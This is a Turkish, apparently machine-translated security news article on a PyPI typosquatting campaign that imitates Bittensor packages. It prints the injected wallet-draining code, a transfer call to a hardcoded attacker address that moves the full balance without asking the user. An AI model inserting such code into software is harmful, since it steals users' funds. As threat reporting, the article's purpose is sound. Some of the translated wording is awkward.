Python Paket Dizin (PYPI) aracılığıyla dağıtılan kötü amaçlı Python paketleri aracılığıyla Bittensor ekosistemini hedefleyen sofistike bir kripto para hırsızlığı kampanyası ortaya çıktı.
Saldırı, geliştiricileri ve kullanıcıları meşru bittensor paketlerinin tehlikeye atılmış versiyonlarını yüklemeye yönlendirmek için yazım hatası tekniklerini kullanıyor ve sonuçta rutin stoping operasyonları sırasında tam cüzdan drenajına neden oluyor.
Kötü niyetli kampanya, 6 Ağustos 2025’te 25 dakikalık konsantre bir pencerede yayınlanan beş yazım hatası paketinin tümü ile hassasiyetle düzenlendi.
Bu paketler, hepsi otantik bittensor ve bittensor-cli paketlerini taklit etmek için tasarlanmış “Bitensor” (‘T’ eksik), “bittenso” (kesik) ve “qbittensor” (önek) gibi varyasyonları içeriyordu.
Saldırganlar, meşru paket sürümlerini yakından eşleştirmek için 9.9.4 ve 9.9.5 sürüm numaralarını stratejik olarak seçerek geliştirici yazım hataları veya kopya yapıştır hataları aracılığıyla kazara kurulum olasılığını en üst düzeye çıkardılar.
GitLab analistleri, popüler bittensor paketleriyle ilgili şüpheli etkinliği işaretleyen otomatik paket izleme sistemi aracılığıyla tehdidi belirlediler.
Keşif, rutin blockchain operasyonlarındaki güvenden yararlanan ve özellikle önemli bir kripto para birimi sahiplerine sahip olan stoping faaliyetlerine katılan kullanıcıları hedefleyen özenle tasarlanmış bir saldırı ortaya çıkardı.
Kaçırılmış Stoping Mekanizmanın Analizi
Saldırının teknik karmaşıklığı, meşru biriken işlevselliğin cerrahi olarak değiştirilmesinde yatmaktadır. stake_extrinsic İşlev bulunan işlev bittensor_cli/src/commands/stake/add.py.
Saldırganlar 275. satırda, beklenen stoping sürecini tamamen altüst eden kötü amaçlı kod ekledi:-
result = await transfer_extrinsic(
subtensor=subtensor,
wallet=wallet,
destination="5FjgkuPzAQHax3hXsSkNtue8E7moEYjTgrDDGxBvCzxc1nqR",
amount=amount,
transfer_all=True,
prompt=False
)Bu kod enjeksiyonu ayarlayarak yıkıcı verimlilikle çalışır transfer_all=True sadece amaçlanan bahis tutarından ziyade tüm cüzdanları boşaltmak için prompt=False Kullanıcı Onayı iletişim kutularını atlar.
Sabit kodlu hedef cüzdan adresi, daha sonra nihai konsolidasyon adresine ulaşmadan önce birkaç ara cüzdan içeren çok hızlı bir aklama ağından dağıtılan çalıntı fonlar için bir toplama noktası görevi görür.
SOC’nizi en son tehdit verilerine tam erişimle donatın Herhangi biri. Olay yanıtı iyileştirebilir -> 14 günlük ücretsiz deneme alın